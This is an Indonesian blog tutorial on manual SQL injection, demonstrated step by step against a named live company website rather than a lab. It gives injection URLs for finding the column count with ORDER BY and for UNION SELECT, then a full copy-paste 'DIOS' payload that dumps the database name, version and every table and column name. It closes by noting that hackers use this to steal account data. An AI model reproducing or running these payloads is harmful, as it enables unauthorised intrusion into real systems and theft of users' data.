Tutorial SQL Injection Manual beserta live target

Tutorial SQL Injection Manual.ok kali ini saya akan memberikan tutorial SQL Injection manual ok Kali ini live targetnya adalah ini

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1

Ok lamgsung saja mulai tutornya

[STEP 1]

Pertama kita tambahkan ‘ di parameternya contohnya

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1′

Setelah itu jika tampilan web error’ maka web tersebut vuln terhadap sqli

[STEP 2]

Setelah itu jika web tersebut vuln kita akan mencoba mencari tahu jumlah tablenya dengan menambahkan +order+by+1–+- contoh :

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1’+order+by+1–+-

Maka web akan normal lagi dan tidak ada error lalu kalian lakukan hingga menemukan jumlah tablenya.kalian +order+by+1–+- lalu +order+by+2–+- dan seterusnya hingga web kembali error sebagai contoh disini saat saya order by 5 web tidak error’ tetapi saat saya order by 6 website tersebut error

Baca Juga  Pengertian SQL dan fungsi SQL

tidak error

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+5–+-

Error

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+6–+-

Maka diketahui tablenya ada 5 karena saat kita order by 6 error

[STEP 3]

setelah itu kita lakukan union select untuk menyelect tablenya dan memunculkannya lakukan seperti ini +union+select+jumlah table–+-

Contoh disitu ada 5 table maka lakukan seperti ini

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1’+union+select+1,2,3,4,5–+-

[STEP 4]

Jika sudah maka jika kalian telusuri webnya dari atas sampai kebawah akan ada bagian web yang error’ dan memunculkan suatu angka

Baca Juga  Pengertian SQL dan fungsi SQL

Contoh dalam kasus ini muncul angka 4 dan 5 maka kita pilih salah 1 mau angka yang mana jika sudah tinggal kalian hilangkan angka tersebut di union select dan rubah menjadi Dios kalian contoh disini saya memilih angka 4 maka seperti ini +union+select+1,2,3,Dios,5–+-

Contoh:

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+union+select+1,2,3,concat(0x496E6A656374204279203738373061,'<br>’,'<img src =”https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg” height=”150″ width=”150″><br>’,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

,5–+-

Baginkalian yang gapunya Dios salin kode Dios saya dibawah ini

concat(0x496E6A656374204279203738373061,'<br>','<img src ="https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg" height="150" width="150"><br>',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

jika sudah maka kita dapat melihat semua database pada website itu.kerentanan ini yang biasanya digunakan hacker untuk mencuri data seperti akun dan lain lain

Leave a Reply

Your email address will not be published.